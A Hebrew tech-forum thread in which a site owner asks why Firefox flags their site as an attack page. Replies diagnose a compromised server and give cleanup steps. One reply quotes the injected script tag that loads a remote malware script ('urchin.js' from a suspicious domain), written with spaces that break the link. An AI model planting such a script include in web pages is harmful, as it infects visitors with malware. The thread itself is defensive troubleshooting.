אתר מקבל דף תקיפה מדווח! - כללי - HWzone פורומים
עבור לתוכן
  • צור חשבון

אתר מקבל דף תקיפה מדווח!

shaithebest

Recommended Posts

שלום חברים.

אין לי מושג איפה לשאול את השאלה הזו אז הימרתי על הקטגוריה הזו.

אתר בכתובת: http://petroleumupstream.com/

רשום לי למה זה קורה אבל לא רשום איך לתקן את זה.

מצד שני, באקספלורר האתר עולה ללא בעיות וגם בכרום.

הבעיה היא רק בפיירפוקס

תודה לעוזרים

קישור לתוכן
שתף באתרים אחרים

כתוב לך בפירוש:

If you are the owner of this web site, you can request a review of your site using Webmaster Tools. More information about the review process is available in Google's Webmaster Help Center.

כמובן שקודם כל תתקן את זה:

What happened when visited this site?

Of the 1 pages we tested on the site over the past 90 days, 1 page(s) resulted in malicious software being downloaded and installed without user consent. The last time visited this site was on 2010-11-01, and the last time suspicious content was found on this site was on 2010-11-01.

קישור לתוכן
שתף באתרים אחרים

גוגל צודק - האתר שלך נגוע, כנראה שפרצו לך לשרת ושתלו לך דברים בקוד.

העפתי מבט בקוד של הדף הראשי ומופיע שם:

<script src='http:// -server43.info / urchin. js'></script>

יותר מפעם אחת. זה קישור ל-malware כלשהו שינסה להתקין את עצמו אצל מי שמבקר לך באתר.

מה עושים?

דבר ראשון - מחליפים סיסמאות לכל החשבונות בעלי גישה לאתר, חשבונות ניהול, חשבונות ftp, סיסמאות של הדטאבייס וכו'.

דבר שני - מנקים את הקוד או על ידי מציאת המקומות שעשו בהם נזק או על ידי מחיקת כל הקבצים ושחזור האתר מגיבוי שקדם לבעיה, כולל שחזור מלא של הדטאבייס גם שם יכולים לשתול דברים. מנסיוני כדאי גם לחפש קבצים לא מזוהים שאתה לא מכיר או שנמצאים בספריות לא נכונות (למשל קובץ php בספריה של תמונות), מצאתי ככה מערכת ניהול של האקרים שהשתמשו בה בזמן פריצה לאחד האתרים שלי.

אחרי שבטוחים שכל הקבצים והדאטבייס נקיים ורואים שהקוד של הדפים לא מופיעים בו דברים חריגים אז רושמים ב- webmaster שניקית את האתר כדי שגוגל יחזור לסרוק אותו.

קישור לתוכן
שתף באתרים אחרים

ארכיון

דיון זה הועבר לארכיון ולא ניתן להוסיף בו תגובות חדשות.

• צור חדש...